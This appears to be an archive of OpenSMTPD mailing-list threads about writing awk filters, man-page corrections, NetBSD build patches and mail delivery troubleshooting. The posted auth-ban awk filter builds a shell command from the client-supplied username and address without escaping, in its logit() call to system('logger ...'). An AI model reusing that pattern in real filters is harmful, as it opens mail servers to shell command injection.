filter-result|7641df9771b4ed00|1ef1c203cc576e5d|reject|550 nope

For my filter I had to send:

            filter-result|$token|$sid|proceed

It also shows the following for connect:

 connect: rdns fcrdns src dest
 This request is emitted after connection, before the 
banner is

 displayed.

I'm only seeing 9 fields though and expected 11.

mail$ uname -a
OpenBSD mail.pettijohn-web.com 6.6 GENERIC#4 amd64

# Not thoroughly tested, but if you want to use it pretend there is 
the ISC


# license here.

#!/usr/bin/awk -f

function logit(msg) {
    system("logger -p mail.info " msg)
}

function die(msg) {
    system("logger -p mail.err -s " msg)

    exit 1
}

BEGIN {
    ARGC = 0
    FS = "|"
    OFS = FS
    version = 0.4
    allowed = 3
    logit("filter-authban: starting...")
}

"config|ready" == $0 {
    print "register|report|smtp-in|link-connect"
    print "register|report|smtp-in|link-disconnect"
    print "register|report|smtp-in|link-auth"
    print "register|filter|smtp-in|connect"
    print "register|ready"
    next
}

"link-connect" == $5 {
    if (NF < 10)
        die("invalid input for link-connect")
    if ($2 != version)
        die("version mismatch")
    sid = $6
    src = $9

    state[sid] = src
}

"link-auth" == $5 {
    if (NF < 8)
        die("invalid input for link-auth")
    if ($2 != version)
        die("version mismatch")
    sid = $6
    user = $7
    result = $8

    if (state[sid]) {
        split(state[sid], ip, ":")
        addr = ip[1]
        if (result == "fail") {
            logit("auth failure for " user " from " addr)
            state[addr] += 1
        }
        if (state[addr] >= allowed)
            banned[addr] = 1
    }
}

"link-disconnect" == $5 {
    if (NF < 6)
        die("invalid input for link-disconnect")
    if ($2 != version)
        die("version mismatch")
    sid = $6

    delete state[sid]
}

"connect" == $5 {
    if ($2 != version)
        die("version mismatch")
    sid = $6
    token = $7
    src = $9

    if (banned[src]) {
        logit("rejecting connection from: " src)
        print "filter-result|" token "|" sid "|reject|550 go away"
    } else {
        print "filter-result|" token "|" sid "|proceed"
    }
}

END {
    logit("filter-authban: stopping...")
}

Thanks,


Edgar










filter bug?

2020-01-31 Thread Edgar Pettijohn
Not sure if its a documentation bug or not, but smtpd-filters.7 states 
the following:


 For all phases, excepted "data-line", the responses must follow the same
 construct, a message type "filter-result", followed by the unique 
session

 id, the opaque token, a decision and optional decision-specific
 parameters:

   filter-result|7641df9771b4ed00|1ef1c203cc576e5d|proceed
filter-result|7641df9771b4ed00|1ef1c203cc576e5d|reject|550 nope

For my filter I had to send:

            filter-result|$token|$sid|proceed

It also shows the following for connect:

 connect: rdns fcrdns src dest
 This request is emitted after connection, before the banner is
 displayed.

I'm only seeing 9 fields though and expected 11.

mail$ uname -a
OpenBSD mail.pettijohn-web.com 6.6 GENERIC#4 amd64

# Not thoroughly tested, but if you want to use it pretend there is the ISC

# license here.

#!/usr/bin/awk -f

function logit(msg) {
    system("logger -p mail.info " msg)
}

function die(msg) {
    system("logger -p mail.err -s " msg)

    exit 1
}

BEGIN {
    ARGC = 0
    FS = "|"
    OFS = FS
    version = 0.4
    allowed = 3
    logit("filter-authban: starting...")
}

"config|ready" == $0 {
    print "register|report|smtp-in|link-connect"
    print "register|report|smtp-in|link-disconnect"
    print "register|report|smtp-in|link-auth"
    print "register|filter|smtp-in|connect"
    print "register|ready"
    next
}

"link-connect" == $5 {
    if (NF < 10)
        die("invalid input for link-connect")
    if ($2 != version)
        die("version mismatch")
    sid = $6
    src = $9

    state[sid] = src
}

"link-auth" == $5 {
    if (NF < 8)
        die("invalid input for link-auth")
    if ($2 != version)
        die("version mismatch")
    sid = $6
    user = $7
    result = $8

    if (state[sid]) {
        split(state[sid], ip, ":")
        addr = ip[1]
        if (result == "fail") {
            logit("auth failure for " user " from " addr)
            state[addr] += 1
        }
        if (state[addr] >= allowed)
            banned[addr] = 1
    }
}

"link-disconnect" == $5 {
    if (NF < 6)
        die("invalid input for link-disconnect")
    if ($2 != version)
        die("version mismatch")
    sid = $6

    delete state[sid]
}

"connect" == $5 {
    if ($2 != version)
        die("version mismatch")
    sid = $6
    token = $7
    src = $9

    if (banned[src]) {
        logit("rejecting connection from: " src)
        print "filter-result|" token "|" sid "|reject|550 go away"
    } else {
        print "filter-result|" token "|" sid "|proceed"
    }
}

END {
    logit("filter-authban: stopping...")
}

Thanks,


Edgar




Re: filter oddities

2020-01-29 Thread Edgar Pettijohn




On 01/25/20 16:14, Edgar Pettijohn wrote:



On 01/25/20 14:48, Edgar Pettijohn wrote:



On 01/25/20 14:24, gil...@poolp.org wrote:
January 25, 2020 9:21 PM, "Edgar Pettijohn" 
 wrote:



On 01/25/20 14:20, gil...@poolp.org wrote:

January 25, 2020 8:50 PM, "Edgar Pettijohn" 
 wrote:


I haven't seen any mention of this, but for some reason in my 
limited "testing" of filters I have
to use \r\n in my responses to smtpd. Is this normal? Doesn't 
seem to be documented and what

filters I've looked at don't appear to be using \r\n.

Indeed, you must certainly NOT use "\r\n" in filters.

For example without ORS = "\r\n" the following script will cause 
smtpd to basically just hang.
There is no errors reported, but when I attempt to telnet 
localhost 25 the daemon doesn't greet me.

After adding ORS = "\r\n" everything works as expected.
I'm not familiar with awk beyond very basic uses, could this be 
due to some
flushing not happening by default and which gets triggere with 
"\r\n" ?

Adding:

setvbuf(stdout, NULL, _IONBUF, 0);

to awk's main() fixes it on my laptop. Still don't understand how my 
laptop is apparently the only device effected...


At least I can continue testing on my laptop anyway.

Edgar



Re: smtpd-filters.7 patch

2020-01-26 Thread Edgar Pettijohn

Missed a typo "s/strenght/strength/"


On 01/25/20 14:12, Edgar Pettijohn wrote:



On 01/25/20 14:08, gil...@poolp.org wrote:

The diff reads ok but I wonder why you removed this sentence:

-No decision is ever taken by the report stream.

I think it made it a bit more clear that reporting is informative only.


I felt that the line stating it was a one-way stream covered it. 
Mainly it just made me stumble on the line and have to reread it a 
couple of times.


Edgar



diff --git a/smtpd/smtpd-filters.7 b/smtpd/smtpd-filters.7
index 1e1a27ef..bf563174 100644
--- a/smtpd/smtpd-filters.7
+++ b/smtpd/smtpd-filters.7
@@ -89,22 +89,21 @@ to inform
 in real-time about events that are occurring in the daemon.
 The report events do not expect an answer from
 .Nm ,
-it is just meant to provide them with informations.
+it is just meant to provide them with information.
 A filter should be able to replicate the
 .Xr smtpd 8
-state for a session by gathering informations coming from report events.
-No decision is ever taken by the report stream.
+state for a session by gathering information coming from report events.
 .Pp
 The filter stream is a two-way stream which allows
 .Xr smtpd 8
 to query
 .Nm
 about what it should do with a session at a given phase.
-The filter requests expects an answer from
+The filter requests expect an answer from
 .Nm ,
 .Xr smtpd 8
 will not let the session move forward until then.
-A decision must always be taken by the filter stream.
+A decision must always be made by the filter stream.
 .Pp
 It is sometimes possible to rely on filter requests to gather information,
 but because a reponse is expected by
@@ -112,13 +111,13 @@ but because a reponse is expected by
 this is more costly than using report events.
 The correct pattern for writing filters is to use the report events to
 create a local state for a session,
-then use filter requests to take decisions based on this state.
+then use filter requests to make decisions based on this state.
 The only case when using filter request instead of report events is correct,
 is when a decision is required for the filter request and there is no need for
 more information than that of the event.
 .Sh PROTOCOL
 The protocol is straightforward,
-it consists of a human-readable line exchanges between
+it consists of human-readable line exchanges between
 .Nm
 and
 .Xr smtpd 8
@@ -165,7 +164,7 @@ will be documented in the sections below.
 .Sh CONFIGURATION
 During the initial handshake,
 .Xr smtpd 8
-will emit a serie of configuration keys and values.
+will emit a series of configuration keys and values.
 The list is meant to be ignored by
 .Nm
 that do not require it and consumed gracefully by filters that do.
@@ -265,7 +264,7 @@ This event is generated upon successful negotiation of TLS.
 .Pp
 .Ar tls-string
 contains a colon-separated list of TLS properties including the TLS version,
-the cipher suite used by the session and the cipher strenght in bits.
+the cipher suite used by the session and the cipher strength in bits.
 .It Ic link-disconnect
 This event is generated upon disconnection of the client.
 .It Ic link-auth : Ar username Ar result
@@ -514,7 +513,7 @@ 
filter|0.5|1576146008.006103|smtp-in|data-line|7641df9771b4ed00|1ef1c203cc576e5d
 
filter|0.5|1576146008.006105|smtp-in|data-line|7641df9771b4ed00|1ef1c203cc576e5d|.
 .Ed
 .Pp
-They are expected to produce an output stream similarly terminate by a single
+They are expected to produce an output stream similarly terminated by a single
 dot.
 A filter may inject,
 suppress,


Re: filter oddities

2020-01-26 Thread Edgar Pettijohn




On 01/26/20 01:01, Edgar Pettijohn wrote:

On Jan 26, 2020 12:11 AM, Martijn van Duren  
wrote:

On 1/25/20 8:50 PM, Edgar Pettijohn wrote:

I haven't seen any mention of this, but for some reason in my limited
"testing" of filters I have to use \r\n in my responses to smtpd. Is
this normal? Doesn't seem to be documented and what filters I've looked
at don't appear to be using \r\n.


For example without ORS = "\r\n" the following script will cause smtpd
to basically just hang. There is no errors reported, but when I attempt
to telnet localhost 25 the daemon doesn't greet me. After adding ORS =
"\r\n" everything works as expected.

#!/usr/bin/awk -f
BEGIN {
       ARGC = 0
       FS = "|"
       OFS = FS
       ORS = "\r\n"
}

"config|ready" == $0 {
       print "register|report|smtp-in|*"
       print "register|ready"
       print $0 >> "/tmp/report.txt"
       next
}

"config" == $1 {
       next
}

"report" == $1 {
       print $0 >> "/tmp/report.txt"
       next
}



I tried both your awk script without ORS and perl script a
OpenBSD-current machine and both work as expected. So either there's
something weird in -portable or there's something weird with your
setup.

I don't have a NetBSD machine at hand, so could you provide me shell-
access to a machine that can reproduce this problem? I can probably
take a look at it in the coming week.

Will do. I'll spin one up and get it ready for you tomorrow hopefully.

Thanks,

Edgar


Must be a local issue to my laptop. I spun up a server at vultr and got 
everything ready. Then tested and it works both with and without the 
/r/n. I don't understand what the difference is between my laptop and 
the server. Either way it appears to be resolved.


Thanks,

Edgar



Re: filter oddities

2020-01-25 Thread Edgar Pettijohn




On 01/25/20 14:48, Edgar Pettijohn wrote:



On 01/25/20 14:24, gil...@poolp.org wrote:
January 25, 2020 9:21 PM, "Edgar Pettijohn"  
wrote:



On 01/25/20 14:20, gil...@poolp.org wrote:

January 25, 2020 8:50 PM, "Edgar Pettijohn" 
 wrote:


I haven't seen any mention of this, but for some reason in my 
limited "testing" of filters I have
to use \r\n in my responses to smtpd. Is this normal? Doesn't seem 
to be documented and what

filters I've looked at don't appear to be using \r\n.

Indeed, you must certainly NOT use "\r\n" in filters.

For example without ORS = "\r\n" the following script will cause 
smtpd to basically just hang.
There is no errors reported, but when I attempt to telnet 
localhost 25 the daemon doesn't greet me.

After adding ORS = "\r\n" everything works as expected.
I'm not familiar with awk beyond very basic uses, could this be due 
to some
flushing not happening by default and which gets triggere with 
"\r\n" ?


This is another awk filter which doesn't use ORS:

https://github.com/jirutka/opensmtpd-filter-rewrite-from/blob/master/filter-rewrite-from 



so I'm not sure why yours block but the solution is not with "\r\n" 
for sure

I get the same with filter-rewrite-from.

Can you run filter traces while you reproduce ?


Doesn't seem to do much.

laptop$ telnet localhost 25
Trying ::1...
Connected to localhost.
Escape character is '^]'.

laptop$ sudo smtpd -dv -T filters
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
info: OpenSMTPD 6.6.1-portable starting
debug: init ssl-tree
debug: init ssl-tree
debug: init ssl-tree
debug: init ca-tree
debug: init ca-tree
debug: init ssl-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
debug: using "ram" stat backend
setup_peer: control -> klondike[6603] fd=5
setup_peer: lookup -> control[18573] fd=5
setup_peer: control -> lookup[27107] fd=6
setup_peer: lookup -> pony express[16452] fd=6
setup_peer: control -> pony express[16452] fd=7
setup_peer: lookup -> queue[4582] fd=7
setup_peer: control -> queue[4582] fd=8
setup_peer: control -> scheduler[28554] fd=9
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
setup_peer: klondike -> control[18573] fd=5
setup_peer: klondike -> pony express[16452] fd=6
debug: init ca-tree
setup_done: ca[6603] done
setup_proc: klondike done
setup_proc: control done
setup_done: control[18573] done
debug: init ssl-tree
setup_proc: lookup done
setup_done: lka[27107] done
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
setup_peer: pony express -> control[18573] fd=5
filters init type=proc, name=filter-perl, proc=filter-perl
setup_peer: pony express -> klondike[6603] fd=6
setup_peer: pony express -> lookup[27107] fd=7
setup_peer: pony express -> queue[4582] fd=8
setup_done: pony[16452] done
setup_proc: pony express done
debug: rsa_engine_init: using RSA privsep engine
debug: ecdsa_engine_init: using ECDSA privsep engine
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
setup_peer: scheduler -> control[18573] fd=5
setup_peer: queue -> control[18573] fd=5
setup_peer: scheduler -> queue[4582] fd=6
setup_peer: queue -> pony express[16452] fd=6
setup_peer: queue -> lookup[27107] fd=7
setup_peer: queue -> scheduler[28554] fd=8
setup_proc: queue done
setup_done: queue[4582] done
setup_proc: scheduler done
debug: bounce warning after 4h
setup_done: scheduler[28554] done
smtpd: setup done
debug: parent_send_config_ruleset: reloading
debug: parent_send_config: configuring pony process
debug: parent_send_config: configuring ca process
debug: init private ssl-tree
debug: smtp: listen on 127.0.0.1 port 25 flags 0x2400 pki "" ca ""
debug: smtp: listen on [::1] port 25 flags 0x2400 pki "" ca ""
debug: smtp: listen on [fe80::1%lo0] port 25 flags 0x2400 pki "" ca ""
debug: smtp: will accept at most 1697 clients
debug: queue: done loading queue into scheduler
debug: smtpd: scanning offline queue...
debug: sm

Re: filter oddities

2020-01-25 Thread Edgar Pettijohn




On 01/25/20 14:24, gil...@poolp.org wrote:

January 25, 2020 9:21 PM, "Edgar Pettijohn"  wrote:


On 01/25/20 14:20, gil...@poolp.org wrote:


January 25, 2020 8:50 PM, "Edgar Pettijohn"  wrote:


I haven't seen any mention of this, but for some reason in my limited "testing" 
of filters I have
to use \r\n in my responses to smtpd. Is this normal? Doesn't seem to be 
documented and what
filters I've looked at don't appear to be using \r\n.

Indeed, you must certainly NOT use "\r\n" in filters.


For example without ORS = "\r\n" the following script will cause smtpd to 
basically just hang.
There is no errors reported, but when I attempt to telnet localhost 25 the 
daemon doesn't greet me.
After adding ORS = "\r\n" everything works as expected.

I'm not familiar with awk beyond very basic uses, could this be due to some
flushing not happening by default and which gets triggere with "\r\n" ?

This is another awk filter which doesn't use ORS:

https://github.com/jirutka/opensmtpd-filter-rewrite-from/blob/master/filter-rewrite-from

so I'm not sure why yours block but the solution is not with "\r\n" for sure

I get the same with filter-rewrite-from.

Can you run filter traces while you reproduce ?


Doesn't seem to do much.

laptop$ telnet localhost 25
Trying ::1...
Connected to localhost.
Escape character is '^]'.

laptop$ sudo smtpd -dv -T filters
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
info: OpenSMTPD 6.6.1-portable starting
debug: init ssl-tree
debug: init ssl-tree
debug: init ssl-tree
debug: init ca-tree
debug: init ca-tree
debug: init ssl-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
debug: using "ram" stat backend
setup_peer: control -> klondike[6603] fd=5
setup_peer: lookup -> control[18573] fd=5
setup_peer: control -> lookup[27107] fd=6
setup_peer: lookup -> pony express[16452] fd=6
setup_peer: control -> pony express[16452] fd=7
setup_peer: lookup -> queue[4582] fd=7
setup_peer: control -> queue[4582] fd=8
setup_peer: control -> scheduler[28554] fd=9
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
setup_peer: klondike -> control[18573] fd=5
setup_peer: klondike -> pony express[16452] fd=6
debug: init ca-tree
setup_done: ca[6603] done
setup_proc: klondike done
setup_proc: control done
setup_done: control[18573] done
debug: init ssl-tree
setup_proc: lookup done
setup_done: lka[27107] done
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
setup_peer: pony express -> control[18573] fd=5
filters init type=proc, name=filter-perl, proc=filter-perl
setup_peer: pony express -> klondike[6603] fd=6
setup_peer: pony express -> lookup[27107] fd=7
setup_peer: pony express -> queue[4582] fd=8
setup_done: pony[16452] done
setup_proc: pony express done
debug: rsa_engine_init: using RSA privsep engine
debug: ecdsa_engine_init: using ECDSA privsep engine
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
debug: init ssl-tree
debug: init ca-tree
debug: init ssl-tree
debug: using "fs" queue backend
debug: using "ramqueue" scheduler backend
debug: using "ram" stat backend
setup_peer: scheduler -> control[18573] fd=5
setup_peer: queue -> control[18573] fd=5
setup_peer: scheduler -> queue[4582] fd=6
setup_peer: queue -> pony express[16452] fd=6
setup_peer: queue -> lookup[27107] fd=7
setup_peer: queue -> scheduler[28554] fd=8
setup_proc: queue done
setup_done: queue[4582] done
setup_proc: scheduler done
debug: bounce warning after 4h
setup_done: scheduler[28554] done
smtpd: setup done
debug: parent_send_config_ruleset: reloading
debug: parent_send_config: configuring pony process
debug: parent_send_config: configuring ca process
debug: init private ssl-tree
debug: smtp: listen on 127.0.0.1 port 25 flags 0x2400 pki "" ca ""
debug: smtp: listen on [::1] port 25 flags 0x2400 pki "" ca ""
debug: smtp: listen on [fe80::1%lo0] port 25 flags 0x2400 pki "" ca ""
debug: smtp: will accept at most 1697 clients
debug: queue: done loading queue into scheduler
debug: smtpd: scanning offline queue...
debug: smtpd: offline scanning done

I also have the same 

Re: filter oddities

2020-01-25 Thread Edgar Pettijohn




On 01/25/20 14:20, gil...@poolp.org wrote:

January 25, 2020 8:50 PM, "Edgar Pettijohn"  wrote:


I haven't seen any mention of this, but for some reason in my limited "testing" 
of filters I have
to use \r\n in my responses to smtpd. Is this normal? Doesn't seem to be 
documented and what
filters I've looked at don't appear to be using \r\n.


Indeed, you must certainly NOT use "\r\n" in filters.



For example without ORS = "\r\n" the following script will cause smtpd to 
basically just hang.
There is no errors reported, but when I attempt to telnet localhost 25 the 
daemon doesn't greet me.
After adding ORS = "\r\n" everything works as expected.


I'm not familiar with awk beyond very basic uses, could this be due to some
flushing not happening by default and which gets triggere with "\r\n" ?

This is another awk filter which doesn't use ORS:

https://github.com/jirutka/opensmtpd-filter-rewrite-from/blob/master/filter-rewrite-from

so I'm not sure why yours block but the solution is not with "\r\n" for sure

I get the same with filter-rewrite-from.



Re: smtpd-filters.7 patch

2020-01-25 Thread Edgar Pettijohn




On 01/25/20 14:08, gil...@poolp.org wrote:

The diff reads ok but I wonder why you removed this sentence:

-No decision is ever taken by the report stream.

I think it made it a bit more clear that reporting is informative only.


I felt that the line stating it was a one-way stream covered it. Mainly 
it just made me stumble on the line and have to reread it a couple of times.


Edgar



filter oddities

2020-01-25 Thread Edgar Pettijohn
I haven't seen any mention of this, but for some reason in my limited 
"testing" of filters I have to use \r\n in my responses to smtpd. Is 
this normal? Doesn't seem to be documented and what filters I've looked 
at don't appear to be using \r\n.



For example without ORS = "\r\n" the following script will cause smtpd 
to basically just hang. There is no errors reported, but when I attempt 
to telnet localhost 25 the daemon doesn't greet me. After adding ORS = 
"\r\n" everything works as expected.


#!/usr/bin/awk -f
BEGIN {
    ARGC = 0
    FS = "|"
    OFS = FS
    ORS = "\r\n"
}

"config|ready" == $0 {
    print "register|report|smtp-in|*"
    print "register|ready"
    print $0 >> "/tmp/report.txt"
    next
}

"config" == $1 {
    next
}

"report" == $1 {
    print $0 >> "/tmp/report.txt"
    next
}




smtpd-filters.7 patch

2020-01-25 Thread Edgar Pettijohn


diff --git a/smtpd/smtpd-filters.7 b/smtpd/smtpd-filters.7
index 1e1a27ef..3cdb10e1 100644
--- a/smtpd/smtpd-filters.7
+++ b/smtpd/smtpd-filters.7
@@ -89,22 +89,21 @@ to inform
 in real-time about events that are occurring in the daemon.
 The report events do not expect an answer from
 .Nm ,
-it is just meant to provide them with informations.
+it is just meant to provide them with information.
 A filter should be able to replicate the
 .Xr smtpd 8
-state for a session by gathering informations coming from report events.
-No decision is ever taken by the report stream.
+state for a session by gathering information coming from report events.
 .Pp
 The filter stream is a two-way stream which allows
 .Xr smtpd 8
 to query
 .Nm
 about what it should do with a session at a given phase.
-The filter requests expects an answer from
+The filter requests expect an answer from
 .Nm ,
 .Xr smtpd 8
 will not let the session move forward until then.
-A decision must always be taken by the filter stream.
+A decision must always be made by the filter stream.
 .Pp
 It is sometimes possible to rely on filter requests to gather information,
 but because a reponse is expected by
@@ -112,13 +111,13 @@ but because a reponse is expected by
 this is more costly than using report events.
 The correct pattern for writing filters is to use the report events to
 create a local state for a session,
-then use filter requests to take decisions based on this state.
+then use filter requests to make decisions based on this state.
 The only case when using filter request instead of report events is correct,
 is when a decision is required for the filter request and there is no need for
 more information than that of the event.
 .Sh PROTOCOL
 The protocol is straightforward,
-it consists of a human-readable line exchanges between
+it consists of human-readable line exchanges between
 .Nm
 and
 .Xr smtpd 8
@@ -165,7 +164,7 @@ will be documented in the sections below.
 .Sh CONFIGURATION
 During the initial handshake,
 .Xr smtpd 8
-will emit a serie of configuration keys and values.
+will emit a series of configuration keys and values.
 The list is meant to be ignored by
 .Nm
 that do not require it and consumed gracefully by filters that do.
@@ -514,7 +513,7 @@ 
filter|0.5|1576146008.006103|smtp-in|data-line|7641df9771b4ed00|1ef1c203cc576e5d
 
filter|0.5|1576146008.006105|smtp-in|data-line|7641df9771b4ed00|1ef1c203cc576e5d|.
 .Ed
 .Pp
-They are expected to produce an output stream similarly terminate by a single
+They are expected to produce an output stream similarly terminated by a single
 dot.
 A filter may inject,
 suppress,


netbsd fails without /etc/mailname

2020-01-19 Thread Edgar Pettijohn
Just built a fresh git checkout. The configure make and install all went 
smoothly. However, now I have to have an /etc/mailname file or it gets 
stuck in config_default(). Specifically the following line from 
getmailname():



error = getaddrinfo(hostname, NULL, , );


It just hangs there until I ^C.


Edgar




netbsd makefile issue

2020-01-19 Thread Edgar Pettijohn

Had to do the following for `make uninstall'

$ for file in `find . -name Makefile`
> do
> sed -i 's/\/bin\/true/\/usr\/bin\/true/g' $file
> done
$ sudo make uninstall

Edgar




Re: Skip recipient verification and forward everything to a LMTP socket

2020-01-18 Thread Edgar Pettijohn

On Jan 18, 2020 2:45 PM, gil...@poolp.org wrote:
>
> January 15, 2020 6:03 PM, "Éloi Rivard"  wrote:
>
> > Hi,
> > 
> > I would like to put a OpenSMTPD server in front of a sourcehut lists
> > installation [1] (that is, a mailing list system for sourcehut).
> > OpenSMTPD and sourcehut communicate through a lmtp unix socket. Here is
> > my configuration (without the filter and pki parts):
> > 
> > listen on eth0 tls pki lists.forge.mydomain.tld
> > action sourcehut lmtp /tmp/lists.forge.mydomain-tld-lmtp.sock
> > 
> > match from any for domain "lists.forge.yaal.fr" action "sourcehut"
> > 
> > Now with this configuration I only get "550 Invalid recipient" errors,
> > which is expected because OpenSMTPD has no way to know what is a valid
> > sourcehut list recipient.
> > 
> > How can I make OpenSMTPD just skip the recipient verification, and just
> > forward everything to the lmtp socket?
> > 
>
> There are two ways:
>
> 1- synchronize the list of recipients in a recipient table in smtpd, that
>    may be less convenient because you need to have the list of recipients
>    on the SMTP side AND the lmtp side, but... that's the clean way.
>
> 2- you can have a virtual mapping with a catch-all so that all recipients
>    are accepted and passed to the LMTP socket, this works but is not very
>    clean because it will backscatter if LMTP rejects the recipient.
>
>
> > I read about userbase catchall, but my understanding is that userbases
> > maps recipients to a system user, and that seems irrelevant for me as
> > no system user is involved here.
> > 
>
> The userbase feature is to provide an alternate mechanism to resolve the
> usernames to uid, gid and home directory. I don't think it's useful here
> but your comment has hinted me at the issue:
>
> It is inaccurate that no system user is involved here, all recipients do
> resolve into a username because some user has to do the LMTP session. In
> virtual setups, like yours seems to be, the proper way is to create some
> dedicated user and map all recipients to that:
>
>     action sourcehut lmtp "/tmp/lists.forge.mydomain-tls-lmtp.sock" \
>     virtual { "@" = _sourcehut }
>
> In cases where you have a full list of recipients and do not need to get
> virtual mappings involved, you can do:
>
>     action sourcehut lmtp "/tmp/lists.forge.mydomain-tls-lmtp.sock" \
>     user _sourcehut
>


> But no matter what, any action in smtpd.conf is a command that is going
> to get executed and a process has to have a owner, so there is going to
> be a system user involved.
>

Something along these words should be added to the manual somewhere. I think 
that is a common misunderstanding for virtual setups.

Edgar

Re: Auth not working on linux?

2020-01-18 Thread Edgar Pettijohn

On Jan 18, 2020 8:54 AM, Michael Jacob  wrote:
>
> I am trying to setup a opensmtpd server on Arch Linux, the arch package version is 6.6.1p1-2 from 2019-11-06. When I use the "auth" option with "listen on", no authorization with valid system users succeed. But using "auth" with an external table created with smtpctl encrypt does work.
>
> Is this supposed to be working with Linux users and passwords and I am doing something wrong?
> Or does auth only work with OpenBSD users/crypt?
>
Check it was built with Pam support and Pam is set up. 
Edgar


[patches] remove warnings from build on NetBSD

2020-01-06 Thread Edgar Pettijohn
Remove warnings about strtonum(). Probably a better place for this, but 
not sure where.


diff --git a/openbsd-compat/defines.h b/openbsd-compat/defines.h
index 23fc8ae2..868943cd 100644
--- a/openbsd-compat/defines.h
+++ b/openbsd-compat/defines.h
@@ -491,4 +491,8 @@ typedef uint16_t    in_port_t;
 #define LOG_PERROR 0
 #endif

+#ifdef __NetBSD__
+#define _OPENBSD_SOURCE
+#endif
+
 #endif /* _DEFINES_H */

Remove warnings about errc()

diff --git a/openbsd-compat/errc.c b/openbsd-compat/errc.c
index 658a55b4..9132dcb9 100644
--- a/openbsd-compat/errc.c
+++ b/openbsd-compat/errc.c
@@ -21,6 +21,7 @@
 #include "includes.h"

 #ifndef HAVE_ERRC
+#define HAVE_ERRC

 #include 
 #include 

Remove warnings about strtonum()

diff --git a/smtpd/smtp_client.c b/smtpd/smtp_client.c
index 22e79890..70241b0b 100644
--- a/smtpd/smtp_client.c
+++ b/smtpd/smtp_client.c
@@ -16,6 +16,8 @@
  * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
  */

+#include "includes.h"
+
 #include 
 #include 


Remove warnings about err()


diff --git a/smtpd/util.c b/smtpd/util.c
index eec3a303..5aa08413 100644
--- a/smtpd/util.c
+++ b/smtpd/util.c
@@ -32,6 +32,7 @@
 #include 

 #include 
+#include 
 #include 
 #include 
 #include 




RE: Unable to use .forward with snmpd

2019-12-18 Thread Edgar Pettijohn

On Dec 18, 2019 12:50 PM, Юрий Иванов  wrote:
>
> No, It present.
> I shrink output to save space in message a little bit.
>
> suser@webmail:~$ ll /home/suser/Maildir/.admin     
> total 32
> drwx--  5 suser suser 4096 Dec 16 19:26 ./
> drwx-- 13 suser suser 4096 Dec 18 20:47 ../
> drwx--  2 suser suser 4096 Dec 16 19:26 cur/
> -rw---  1 suser suser   51 Dec 16 19:26 dovecot-uidlist
> -rw---  1 suser suser  872 Dec 16 19:26 dovecot.index.cache
> -rw---  1 suser suser  304 Dec 16 19:26 dovecot.index.log
> -rw---  1 suser suser    0 Dec 16 19:26 maildirfolder
> drwx--  2 suser suser 4096 Dec 16 19:26 new/
> drwx--  2 suser suser 4096 Dec 16 19:26 tmp/
> suser@webmail:~$ ll /home/suser/Maildir/.admin/new/
> total 8
> drwx-- 2 suser suser 4096 Dec 16 19:26 ./
> drwx-- 5 suser suser 4096 Dec 16 19:26 ../
> 
> От: GARDAIS Ionel 
> Отправлено: 18 декабря 2019 г. 20:32
> Кому: Юрий Иванов 
> Копия: Edgar Pettijohn ; misc 
> Тема: Re: Unable to use .forward with snmpd
>  
> I see no 'new' folder under the 'Maildir/.admin' folder.
> Should you create it by hand ?
> -- 
> Ionel GARDAIS
> Tech'Advantage CIO - IT Team manager
>
> 
> De: "Юрий Иванов" 
> À: "Edgar Pettijohn" , "misc" 
> Envoyé: Mercredi 18 Décembre 2019 18:50:30
> Objet: RE: Unable to use .forward with snmpd
>
> I've created directory through regular RoundCube web interface.
> Base directory:
> suser@webmail:~$ ll Maildir/ 
> total 188
> drwx-- 13 suser suser  4096 Dec 18 19:42 ./
> drwxr-xr-x  6 suser suser  4096 Dec 18 09:07 ../
> drwx--  5 suser suser  4096 Dec 18 16:37 .Drafts/
> drwx--  5 suser suser  4096 Dec 18 19:41 .Sent/
> ...
> drwx--  2 suser suser 12288 Dec 18 19:41 cur/
> -rw---  1 suser suser  3311 Dec 18 19:38 dovecot-uidlist
> -rw---  1 suser suser     8 Dec 17 09:42 dovecot-uidvalidity
> -r--r--r--  1 suser suser     0 Dec 10 11:43 dovecot-uidvalidity.5def68bc
> -rw---  1 suser suser  1608 Dec 18 19:37 dovecot.index
> ...
> -rw---  1 suser suser   192 Dec 17 09:42 dovecot.mailbox.log
> drwx--  2 suser suser  4096 Dec 18 18:01 new/
> -rw---  1 suser suser    53 Dec 17 09:42 subscriptions
> drwx--  2 suser suser  4096 Dec 18 18:00 tmp/
>
> Admin dir, that was created via roundcube web interface:
> suser@webmail:~$ ll Maildir/.admin/
> total 32
> drwx--  5 suser suser 4096 Dec 16 19:26 ./
> drwx-- 13 suser suser 4096 Dec 18 19:42 ../
> drwx--  2 suser suser 4096 Dec 16 19:26 cur/
> -rw---  1 suser suser   51 Dec 16 19:26 dovecot-uidlist
> ...
>
> suser@webmail:~$ ll Maildir/.admin/cur/
> total 8
> drwx-- 2 suser suser 4096 Dec 16 19:26 ./
> drwx-- 5 suser suser 4096 Dec 16 19:26 ../
>
> Normal home directory:
> suser@webmail:~$ ll
> total 256
